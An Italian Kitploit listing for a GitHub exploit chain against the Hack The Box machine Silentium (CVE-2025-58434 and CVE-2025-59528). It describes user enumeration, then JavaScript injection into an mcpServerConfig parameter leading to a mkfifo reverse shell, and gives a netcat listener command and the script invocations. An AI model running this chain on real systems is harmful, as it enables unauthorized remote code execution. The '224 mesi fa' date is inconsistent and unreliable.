Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-58434-59528-htb-ctf — Sfruttamento Silentium HTB-CTF | Kitploit
Strumenti/GitHubGitHub/jwsly12/cve-2025-58434-59528-htb-ctf
Generazione di PayloadExploitSfruttamento di Applicazioni WebCTFPenetration TestingApprendimento e Formazione
GitHubjwsly12/cve-2025-58434-59528-htb-ctf

CVE-2025-58434-59528-htb-ctf

Sfruttamento Silentium HTB-CTF

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
224 mesi faNon ancora revisionato
Condividi

CVE-2025-58434-59528-htb-ctf

Silentium Exploit Chain

Questa repository contiene la catena di sfruttamento completa per la macchina Silentium su Hack The Box. L'exploit sfrutta una vulnerabilità a due stadi che coinvolge l'enumerazione degli utenti e l'iniezione JavaScript per ottenere Remote Code Execution (RCE).

📝 Descrizione

La catena di vulnerabilità consiste in un difetto di divulgazione di informazioni e una critica iniezione di codice. Prima enumerando gli utenti validi tramite un bug di reimpostazione della password, otteniamo il contesto necessario per colpire l'endpoint customMCP. La RCE viene ottenuta iniettando una funzione JavaScript dannosa nel parametro mcpServerConfig, che viene eseguita dal backend Node.js.

🛠️ Caratteristiche

  • Enumerazione utenti: automatizza la scoperta di email di sistema valide utilizzando una wordlist.
  • Iniezione JavaScript: sfrutta un'IIFE (Immediately Invoked Function Expression) per bypassare la sanitizzazione.
  • Reverse Shell TCP: genera una shell stabile utilizzando un pipe mkfifo.
  • Automazione del payload: gestisce automaticamente tutto l'escape JSON e l'autenticazione Bearer Token.

🚀 Requisiti

Devi avere Python 3 e Bash installati, insieme alla seguente libreria:

pip install requests

💻 Utilizzo

1. Enumera gli utenti

Esegui lo script di enumerazione (Bash) per trovare account validi (richiede users.txt):

python3 CVE-2025-58434.py

2. Avvia il listener

Sulla tua macchina locale, avvia un listener Netcat:

nc -lvnp 4444

3. Esegui l'exploit

Esegui lo script Python fornendo il target, il tuo IP e la chiave API ottenuta:

python3 CVE-2025-59528.py -t -k <API_KEY> -l <YOUR_IP> -p 4444

⚙️ Argomenti

ArgomentoDescrizioneRichiesto
-t, --targetHost targetSì
-k, --keyToken Bearer APISì
-l, --lhostIP del tuo listener (VPN)Sì
-p, --lportPorta del tuo listenerSì

⚠️ Disclaimer

Questo script è inteso per scopi educativi e test di penetrazione autorizzati all'interno di ambienti CTF esclusivamente. Accedere o attaccare target senza autorizzazione preventiva è illegale.


Challenge: Silentium (Hack The Box)
CVE: CVE-2025-58434 | CVE-2025-59528

Scarica lo strumento